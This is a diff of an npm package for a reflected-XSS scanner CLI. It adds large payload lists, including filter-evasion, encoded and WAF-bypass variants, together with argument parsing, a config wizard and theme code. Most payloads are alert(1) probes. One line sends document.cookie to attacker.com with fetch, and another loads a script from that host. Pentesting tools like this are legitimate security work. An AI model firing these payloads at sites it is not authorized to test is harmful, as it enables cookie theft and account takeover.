rav-xss 1.0.28

package/payloads/PureReflex/reflex.txt

@@ -0,0 +1,222 @@
+<script>alert(1)</script>
+<script>alert('XSS')</script>
+<script>prompt(1)</script>
+<script>confirm(1)</script>
+<script>alert(document.cookie)</script>
+<script>alert(document.domain)</script>
+<img src=x onerror=alert(1)>
+<img src=x onerror=prompt(1)>
+<img src=x onerror=confirm(1)>
+<body onload=alert(1)>
+<svg onload=alert(1)>
+<svg/onload=alert(1)>
+<details open ontoggle=alert(1)>
+<marquee onstart=alert(1)>
+<video><source onerror=alert(1)>
+<audio src=x onerror=alert(1)>
+<input autofocus onfocus=alert(1)>
+<select autofocus onfocus=alert(1)>
+<textarea autofocus onfocus=alert(1)>
+<keygen autofocus onfocus=alert(1)>
+<iframe src=javascript:alert(1)>
+<iframe srcdoc="<script>alert(1)</script>">
+<a href="javascript:alert(1)">click</a>
+<form action="javascript:alert(1)"><button>submit</button></form>
+<body onpageshow=alert(1)>
+<body onresize=alert(1)>
+<body onscroll=alert(1)>
+<svg onbegin=alert(1)>
+<animate onbegin=alert(1)>
+<set onbegin=alert(1)>
+<div onmouseover=alert(1)>
+<div onmouseenter=alert(1)>
+<div onmousedown=alert(1)>
+<div onmouseup=alert(1)>
+<div onclick=alert(1)>
+<div ondblclick=alert(1)>
+<div oncontextmenu=alert(1)>
+<div onfocusin=alert(1) tabindex=1>
+<div onfocusout=alert(1) tabindex=1>
+<div onkeydown=alert(1) contenteditable=true>
+<div onkeyup=alert(1) contenteditable=true>
+<div onkeypress=alert(1) contenteditable=true>
+<div oncut=alert(1) contenteditable=true>
+<div oncopy=alert(1) contenteditable=true>
+<div onpaste=alert(1) contenteditable=true>
+<div ondrag=alert(1)>
+<div ondragend=alert(1)>
+<div ondragenter=alert(1)>
+<div ondragleave=alert(1)>
+<div ondragover=alert(1)>
+<div ondragstart=alert(1)>
+<div ondrop=alert(1)>
+<div ontouchstart=alert(1)>
+<div ontouchend=alert(1)>
+<div ontouchmove=alert(1)>
+<div onpointerdown=alert(1)>
+<div onpointerup=alert(1)>
+<div onpointermove=alert(1)>
+<div onanimationstart=alert(1)>
+<div onanimationend=alert(1)>
+<div onanimationiteration=alert(1)>
+<div ontransitionend=alert(1)>
+<div onabort=alert(1)>
+<div onhashchange=alert(1)>
+<div onmessage=alert(1)>
+<div onoffline=alert(1)>
+<div ononline=alert(1)>
+<div onstorage=alert(1)>
+<div onunload=alert(1)>
+<ScRiPt>alert(1)</ScRiPt>
+<SCRIPT>alert(1)</SCRIPT>
+<scr<script>ipt>alert(1)</scr</script>ipt>
+<sCrIpT>alert(1)</sCrIpT>
+<<script>alert(1)//<</script>
+<script>alert(1)</script
+<script>alert(1)//
+<script%20>alert(1)</script>
+<script >alert(1)</script>
+%3Cscript%3Ealert(1)%3C/script%3E
+%3cscript%3ealert(1)%3c/script%3e
+%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E
+%253Cscript%253Ealert(1)%253C%252Fscript%253E
+&#60;script&#62;alert(1)&#60;/script&#62;
+&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
+&#60&#59script&#62&#59alert(1)&#60&#59/script&#62&#59
+<script%00>alert(1)</script>
+<sc%00ript>alert(1)</sc%00ript>
+<%00script>alert(1)</%00script>
+<script%09>alert(1)</script>
+<script%0a>alert(1)</script>
+<script%0d>alert(1)</script>
+<img src=x onerror=alert(1)//
+<img src=x onerror=alert(1)%00
+<img src=x%00 onerror=alert(1)>
+<img src=x onerror='alert(1)'>
+<img src=x onerror="alert(1)">
+<img src=x onerror=`alert(1)`>
+<img src=x onerror=alert(1)>
+<img src=x onerror=alert&lpar;1&rpar;>
+<img src=x onerror=alert&#40;1&#41;>
+<img src=x onerror=alert&#x28;1&#x29;>
+<input onfocus=alert(1) autofocus>
+<input onfocus="alert(1)" autofocus>
+<input onfocus='alert(1)' autofocus>
+\u003Cscript\u003Ealert(1)\u003C/script\u003E
+\x3Cscript\x3Ealert(1)\x3C/script\x3E
+\74script\76alert(1)\74/script\76
+<script>//alert(1)</script>
+<script><!--alert(1)--></script>
+<script><!--//--><![CDATA[//><!--alert(1)//--><!]]></script>
+<script>/**/alert(1)/**/</script>
+<img src=x onerror=/*comment*/alert(1)>
+<style><!--</style><script>alert(1)</script>-->
+<script>window.alert(1)</script>
+<script>self.alert(1)</script>
+<script>parent.alert(1)</script>
+<script>top.alert(1)</script>
+<script>this.alert(1)</script>
+<script>globalThis.alert(1)</script>
+<script>[].constructor.constructor('alert(1)')()</script>
+<script>'alert(1)'instanceof{[Symbol.hasInstance]:eval}</script>
+<script>document.write('<script>alert(1)<\/script>')</script>
+<script>eval('alert(1)')</script>
+<script>setTimeout('alert(1)',0)</script>
+<script>setInterval('alert(1)',0)</script>
+<script>Function('alert(1)')()</script>
+<script>eval('al'+'ert(1)')</script>
+<script>window['al'+'ert'](1)</script>
+<script>window['al\u0065rt'](1)</script>
+<img src=x onerror=window['al'+'ert'](1)>
+<img src=x onerror=eval('al'+'ert(1)')>
+<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
+<script>Function(String.fromCharCode(97,108,101,114,116,40,49,41))()</script>
+<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
+<img src=x onerror=Function(String.fromCharCode(97,108,101,114,116,40,49,41))()>
+<script>eval(atob('YWxlcnQoMSk='))</script>
+<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
+<script>Function(atob('YWxlcnQoMSk='))()</script>
+<svg/onload=alert(1)>
+<svg%0a%0d%09onload=alert(1)>
+<svg onload=alert(1)//
+<svg/////onload=alert(1)>
+<svg/OnLoad=alert(1)>
+<svg/onload=prompt(1)>
+<svg/onload=confirm(1)>
+<svg><set onbegin=alert(1)>
+<svg><animate onbegin=alert(1)>
+<svg><animatetransform onbegin=alert(1)>
+<script>prompt(1)</script>
+<script>confirm(1)</script>
+<img src=x onerror=prompt(1)>
+<img src=x onerror=confirm`1`>
+<body onload=prompt(1)>
+<select autofocus onfocus=alert(1)>
+<textarea autofocus onfocus=alert(1)>
+<keygen autofocus onfocus=alert(1)>
+<a href="javascript:alert(1)">click</a>
+<iframe src=javascript:alert(1)>
+<img src=x onerror=alert(1)//
+<video><source onerror=alert(1)>
+<marquee onstart=alert(1)>
+<script>alert(document.cookie)</script>
+<script>alert(window.location)</script>
+<img src=x onerror=alert(document.cookie)>
+<svg onload=alert(document.domain)>
+<body onload=document.write('<script>alert(1)<\/script>')>
+<script>window['alert'](1)</script>
+<img src=x onerror=window['alert'](1)>
+<script>self['alert'](1)</script>
+<script>top['alert'](1)</script>
+<img src=x onerror=fetch('http://attacker.com/?c='+document.cookie)>
+<script>document.body.innerHTML='<script>alert(1)<\/script>'</script>
+<script>location='javascript:alert(1)'</script>
+<a href="javascript:location='javascript:alert(1)'">click</a>
+javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+"><img src=x onerror=prompt(1);>
+"><svg/onload=alert(1)>
+" onclick=alert(1) id=x
+' onclick=alert(1) id=x
+` onclick=alert(1) id=x
+</script><svg/onload=alert(1)>
+</script><img src=x onerror=alert(1)>
+</title><svg/onload=alert(1)>
+</textarea><svg/onload=alert(1)>
+%253Cscript%253Ealert(1)%253C%252Fscript%253E
+%25253Cscript%25253Ealert(1)%25253C%25252Fscript%25253E
+<image src=x onerror=alert(1)>
+<image src=1 onerror=alert(1)>
+<isindex action="javascript:alert(1)" type=image>
+<isindex action=javascript:alert(1) type=image>
+<div style="background-image:url(javascript:alert(1))">
+<div style="background:url(javascript:alert(1))">
+<div style="width:expression(alert(1))">
+<style>@import'javascript:alert(1)';</style>
+<style>body{background:url('javascript:alert(1)')}</style>
+<link rel="stylesheet" href="javascript:alert(1);">
+<video poster=javascript:alert(1)>
+<video><source onerror="javascript:alert(1)">
+<audio><source onerror="javascript:alert(1)">
+<video onerror="javascript:alert(1)"><source></source></video>
+<video oncanplay="alert(1)" src="http://victim.com/video.mp4">
+<form><button formaction="javascript:alert(1)">submit</button></form>
+<form><input formaction="javascript:alert(1)" type="submit" value="submit">
+<form id="x" action="javascript:alert(1)"><button>submit</button></form>
+<a href="javascript:alert(1)" id="x">click</a>
+<listing><img src=1 onerror=alert(1)></listing>
+<xmp><img src=1 onerror=alert(1)></xmp>
+<svg><style>&lt;img src=1 onerror=alert(1)&gt;</style></svg>
+<svg><style>&#60;img src=1 onerror=alert(1)&#62;</style></svg>
+<script src=//attacker.com/xss.js></script>
+<img src=//attacker.com/xss.png onerror=alert(1)>
+<svg/onload=alert(1)>
+<svg onload=alert(1)>
+<x onfocus=alert(1) autofocus>
+<x onclick=alert(1)>
+<a href=javascript:alert(1)>
+<body onload=alert(1)>
+<q/oncut=alert(1)>
+<q/oncopy=alert(1)>
+<q/onpaste=alert(1)>
+<math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(1)">CLICKME</maction></math>

package/payloads/WAFBypass/wafbypass.txt

@@ -0,0 +1,12 @@
+<svg/onload=alert(1)>
+<a href="javascript:alert(1)">
+<img src=x onerror=alert(1)>
+<body onload=alert(1)>
+<script>%00alert(1)</script>
+<ScRiPt>alert(1)</sCrIpT>
+%253Cscript%253Ealert(1)%253C%252Fscript%253E
+<img src=x onerror=alert(1)>
+<svg/onload=alert(1)>
+<script>eval('al'+'ert(1)')</script>
+<scr<script>ipt>alert(1)</script>
+<img src = x onerror = alert(1)>

package/src/cli/args.js

@@ -0,0 +1,57 @@
+"use strict";
+
+/**
+ * 🔍 Analisa os argumentos da linha de comando
+ * @returns {Object} Argumentos parseados
+ */
+const parseArgs = () => {
+  const args = process.argv.slice(2);
+  return {
+    headed: args.includes("--headed"),
+    verbose: args.includes("--verbose") || args.includes("-v"),
+    help: args.includes("--help") || args.includes("-h"),
+    configure: args.includes("--configure"),
+    openReports: args.includes("--open-reports") || args.includes("-r"),
+    url: getArgValue(args, "--url"),
+    category: getArgValue(args, "--category"),
+    mode: getArgValue(args, "--mode"),
+    delay: parseInt(getArgValue(args, "--delay") || "0", 10)
+  };
+};
+
+/**
+ * 🔍 Obtém o valor de um argumento
+ * @param {Array} args - Lista de argumentos
+ * @param {string} flag - Nome da flag
+ * @returns {string|null} Valor do argumento ou null
+ */
+const getArgValue = (args, flag) => {
+  const idx = args.indexOf(flag);
+  if (idx !== -1 && args[idx + 1] && !args[idx + 1].startsWith("--")) {
+    return args[idx + 1];
+  }
+  return null;
+};
+
+/**
+ * ❓ Verifica se a flag de ajuda foi passada
+ * @param {Object} args - Argumentos parseados
+ * @returns {boolean} true se --help ou -h foi passado
+ */
+const hasHelp = (args) => args.help;
+
+/**
+ * ⚙️ Verifica se a flag de configuração foi passada
+ * @param {Object} args - Argumentos parseados
+ * @returns {boolean} true se --configure foi passado
+ */
+const shouldConfigure = (args) => args.configure;
+
+/**
+ * 📁 Verifica se a flag de abrir relatórios foi passada
+ * @param {Object} args - Argumentos parseados
+ * @returns {boolean} true se --open-reports ou -r foi passado
+ */
+const shouldOpenReports = (args) => args.openReports;
+
+module.exports = { parseArgs, hasHelp, shouldConfigure, shouldOpenReports };

package/src/cli/help.js

@@ -0,0 +1,31 @@
+"use strict";
+
+const chalk = require("chalk");
+
+const showHelp = () => {
+  console.log(chalk.cyan(`
+  ${chalk.bold('🛡️  RAV XSS — Reflected XSS Scanner')}
+
+  ${chalk.hex('#a78bfa').bold('Usage:')}
+    rav-xss
+    rav-xss [options]
+
+  ${chalk.hex('#7ec8e3').bold('Options:')}
+    --url <url>           Target URL with [XSS] placeholder
+    --category <name>     Payload category (Basic, FilterEvasion, Polyglots, WAFBypass)
+    --delay <ms>          Delay between requests (default: 500ms)
+    --verbose, -v         Show detailed output
+    --help, -h            Display this help message
+    --configure           Interactive configuration wizard
+    --open-reports, -r    Open reports folder in file explorer
+
+  ${chalk.hex('#7ec8e3').bold('Examples:')}
+    rav-xss
+    rav-xss --url "https://example.com/page?q=[XSS]" --category Basic
+    rav-xss --configure
+    rav-xss --open-reports
+    rav-xss -r
+  `));
+};
+
+module.exports = { showHelp };

package/src/cli/wizard.js

@@ -0,0 +1,196 @@
+"use strict";
+
+const inquirer = require("inquirer");
+const chalk = require("chalk");
+const boxen = require("boxen");
+const { saveConfig, getDefaultConfig } = require("../config/manager");
+const fs = require("fs");
+const path = require("path");
+const { isTermux } = require("../core/browser");
+
+/**
+ * 🧙‍♂️ Wizard de configuração interativo
+ * Suporte a config.txt externo e detecção automática de ambiente
+ */
+const runWizard = async () => {
+  console.clear();
+  console.log(boxen(chalk.hex("#a78bfa").bold("⚙  Configuration Wizard"), {
+    padding: 1, margin: 1, borderStyle: "round", borderColor: "#a78bfa",
+  }));
+
+  const externalConfig = loadExternalConfig();
+  let existingConfig = {};
+
+  if (externalConfig) {
+    existingConfig = externalConfig;
+  } else {
+    try {
+      existingConfig = JSON.parse(fs.readFileSync("./config.json", "utf8"));
+    } catch (e) { }
+  }
+
+  const isAndroid = isTermux();
+  const availableModes = isAndroid
+    ? ["axios (Termux - Playwright disabled)"]
+    : ["axios", "playwright"];
+  const defaultMode = isAndroid ? "axios" : (existingConfig.mode || "axios");
+
+  if (isAndroid) {
+    console.log(chalk.hex("#FF9E64")("\n  📱 Termux detected - Playwright mode disabled\n"));
+  }
+
+  const answers = await inquirer.prompt([
+    {
+      type: "input", name: "targetName",
+      message: chalk.hex("#7ec8e3")("📋 Target name:"),
+      default: existingConfig.targets?.[0]?.name || defaultCfg.targets[0].name,
+    },
+    {
+      type: "input", name: "targetUrl",
+      message: chalk.hex("#7ec8e3")("🌐 Target URL (use [XSS] as placeholder):"),
+      default: existingConfig.targets?.[0]?.url || defaultCfg.targets[0].url,
+      validate: (input) => input.includes("[XSS]") || "URL must contain [XSS] placeholder",
+    },
+    {
+      type: "number", name: "timeout",
+      message: chalk.hex("#a78bfa")("⏱️  Request timeout (ms):"),
+      default: existingConfig.scanner?.timeout_ms || defaultCfg.scanner.timeout_ms,
+    },
+    {
+      type: "number", name: "delay",
+      message: chalk.hex("#a78bfa")("⏳ Delay between requests (ms):"),
+      default: existingConfig.scanner?.delay_between_requests_ms || defaultCfg.scanner.delay_between_requests_ms,
+    },
+    {
+      type: "list", name: "mode",
+      message: chalk.hex("#4ECDC4")("🔄 Execution mode:"),
+      choices: availableModes,
+      default: defaultMode,
+    },
+    {
+      type: "confirm", name: "showSafe",
+      message: chalk.hex("#ffd93d")("👁️  Show non-vulnerable results?"),
+      default: existingConfig.output?.show_safe || false,
+    },
+  ]);
+
+  const newConfig = getDefaultConfig();
+  newConfig.targets = [{
+    name: answers.targetName,
+    url: answers.targetUrl,
+    notes: "Configured via wizard"
+  }];
+  newConfig.scanner.timeout_ms = answers.timeout;
+  newConfig.scanner.delay_between_requests_ms = answers.delay;
+  newConfig.output.show_safe = answers.showSafe;
+  newConfig.mode = answers.mode.includes("playwright") ? "playwright" : "axios";
+
+  saveConfig(newConfig);
+
+  saveExternalConfig({
+    target: answers.targetUrl,
+    delay: answers.delay,
+    mode: newConfig.mode,
+    timeout: answers.timeout
+  });
+
+  console.log(boxen(chalk.hex("#6bcb77").bold("✓  Configuration saved!"), {
+    padding: 1, margin: 1, borderStyle: "round", borderColor: "#6bcb77",
+  }));
+};
+
+/**
+ * 📄 Carrega configuração do arquivo config.txt
+ * @returns {Object|null} Configuração carregada ou null
+ */
+function loadExternalConfig() {
+  const configPaths = [
+    path.join(process.cwd(), "config.txt"),
+    path.join(__dirname, "..", "..", "config.txt")
+  ];
+
+  for (const configPath of configPaths) {
+    if (fs.existsSync(configPath)) {
+      try {
+        const content = fs.readFileSync(configPath, "utf8");
+        return parseConfigTxt(content);
+      } catch (e) {
+        console.log(chalk.hex("#FF9999")(`⚠️  Error reading config.txt: ${e.message}`));
+      }
+    }
+  }
+
+  return null;
+}
+
+/**
+ * 🔍 Faz parsing do arquivo config.txt
+ * @param {string} content - Conteúdo do arquivo
+ * @returns {Object} Configuração parseada
+ */
+function parseConfigTxt(content) {
+  const config = getDefaultConfig();
+  const lines = content.split("\n");
+
+  for (const line of lines) {
+    const trimmed = line.trim();
+    if (!trimmed || trimmed.startsWith("#") || trimmed.startsWith("//")) continue;
+
+    const match = trimmed.match(/^(\w+)\s*=\s*(.+)$/);
+    if (!match) continue;
+
+    const [, key, value] = match;
+
+    switch (key.toLowerCase()) {
+      case "target":
+      case "url":
+        config.targets = [{
+          name: "External Config",
+          url: value.trim(),
+          notes: "From config.txt"
+        }];
+        break;
+      case "delay":
+        config.scanner.delay_between_requests_ms = parseInt(value) || 500;
+        break;
+      case "mode":
+        if (value.trim().toLowerCase() === "playwright" && !isTermux()) {
+          config.mode = "playwright";
+        } else {
+          config.mode = "axios";
+        }
+        break;
+      case "timeout":
+        config.scanner.timeout_ms = parseInt(value) || 8000;
+        break;
+      case "verbose":
+        config.output.verbose = value.trim().toLowerCase() === "true";
+        break;
+      case "user_agent":
+        config.scanner.user_agent = value.trim();
+        break;
+    }
+  }
+
+  return config;
+}
+
+/**
+ * 💾 Salva configuração em config.txt
+ * @param {Object} config - Configuração a ser salva
+ */
+function saveExternalConfig(config) {
+  let content = "";
+  content += "# RAV XSS Configuration\n";
+  content += `# Generated: ${new Date().toISOString()}\n\n`;
+
+  if (config.target) content += `target=${config.target}\n`;
+  if (config.delay) content += `delay=${config.delay}\n`;
+  if (config.mode) content += `mode=${config.mode}\n`;
+  if (config.timeout) content += `timeout=${config.timeout}\n`;
+
+  const configPath = path.join(process.cwd(), "config.txt");
+  fs.writeFileSync(configPath, content);
+}
+
+module.exports = { runWizard };

package/src/config/colors.js

@@ -0,0 +1,83 @@
+"use strict";
+
+const chalk = require("chalk");
+
+/**
+ * 🎨 Sistema de cores para RAV XSS
+ * Cores vibrantes e acessíveis para melhor experiência visual
+ */
+const colors = {
+    primary: chalk.hex("#06D6A0"),
+    success: chalk.hex("#57f287"),
+    action: chalk.hex("#4ECDC4"),
+    action2: chalk.hex("#4ECDC4"),
+    highlight: chalk.hex("#FFD166"),
+    highlight2: chalk.hex("#F8E789"),
+    warning: chalk.hex("#FF9E64"),
+    info: chalk.hex("#67d1f5"),
+    link: chalk.hex("#8AD4FF").underline,
+    link2: chalk.hex("#8AD4FF"),
+    accent: chalk.hex("#4CC9F0"),
+    danger: chalk.hex("#FF9999"),
+    error: chalk.hex("#F72585"),
+    title: chalk.hex("#E9ECEF").bold,
+    subtitle: chalk.hex("#CED4DA"),
+    text: chalk.hex("#E9ECEF"),
+    muted: chalk.hex("#6C757D"),
+    dim: chalk.hex("#495057"),
+    scan: chalk.hex("#9D4EDD"),
+    tag: chalk.hex("#FF6B6B"),
+    url: chalk.hex("#4ECDC4"),
+    uuid: chalk.hex("#FFD166"),
+    rate: chalk.hex("#20C997"),
+    up: chalk.hex("#57f287"),
+    down: chalk.hex("#FF9999"),
+    stable: chalk.hex("#6C757D"),
+
+    menuItem: chalk.hex("#E9ECEF"),
+    menuItemSelected: chalk.hex("#4ECDC4"),
+    menuDescription: chalk.hex("#6C757D"),
+    menuSeparator: chalk.hex("#495057"),
+    menuConfig: chalk.hex("#FF9E64"),
+    menuExit: chalk.hex("#F72585"),
+
+    icon: {
+        category: "📂",
+        target: "🌐",
+        payload: "🎯",
+        version: "🌱",
+        link: "🔗",
+        exit: "❌",
+        config: "🔧",
+        scan: "🚀",
+        report: "📊",
+        success: "✓",
+        error: "⚠",
+        bullet: "▸",
+        arrow: "→"
+    }
+};
+
+/**
+ * 🎭 Configurações de tema para componentes visuais
+ */
+const theme = {
+    background: '#1a1a1a',
+    border: {
+        primary: '#57f287',
+        success: '#06D6A0',
+        warning: '#FFD166',
+        warning2: '#F8E789',
+        error: '#FF9999',
+        info: '#118AB2',
+        info2: '#67d1f5',
+        scan: '#9D4EDD',
+        tag: '#FF6B6B',
+        up: '#57f287',
+        down: '#FF9999'
+    },
+    padding: 1,
+    margin: 1
+};
+
+module.exports = { colors, theme };